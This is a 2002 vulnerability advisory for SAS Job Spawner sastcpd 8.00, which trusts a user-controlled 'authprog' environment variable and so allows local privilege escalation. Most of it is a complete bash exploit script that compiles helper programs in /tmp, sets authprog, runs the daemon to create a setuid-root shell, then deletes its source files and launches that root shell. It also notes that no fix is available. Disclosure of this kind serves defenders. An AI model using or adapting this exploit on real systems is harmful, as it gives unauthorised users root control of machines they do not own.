
sas - sastcpd trusts environment variables, leading to a local root exploit
31st Jan 2002 [SBWID-5051]
COMMAND

	sastcpd trusts environment variables, leading to a local root exploit

SYSTEMS AFFECTED

	SAS Job Spawner for Open Systems version 8.00

PROBLEM

	The daemon passes the value of a user-controlled environment variable,
	'authprog', to execve() as the program to run. If sastcpd is setuid,
	that program runs with the daemon's elevated privileges.

	Exploit
	=======

	#!/bin/bash
	# sastcpd 8.0 'authprog' vulnerability.
	# rpc <rpc@unholy.net> || <h@ckz.org>
	# Thanks sharefuzz!

	cat <<EOT >/tmp/hesh.c
	int
	main(void)
	{
		setuid(0);
		setgid(0);
		execl("/bin/ksh", "ksh", (char *)0);
	}
	EOT

	cat <<EOT >/tmp/heh.c
	int
	main(void)
	{
		setuid(0);
		setgid(0);
		system("chown 0:0 /tmp/hesh");
		system("chmod 4755 /tmp/hesh");
		return 0;
	}
	EOT

	gcc -o /tmp/heh /tmp/heh.c
	gcc -o /tmp/hesh /tmp/hesh.c

	export authprog=/tmp/heh
	/path/to/sas/utilities/bin/sastcpd

	sleep 1
	rm /tmp/he*.c
	rm /tmp/heh
	/tmp/hesh

SOLUTION

	None yet
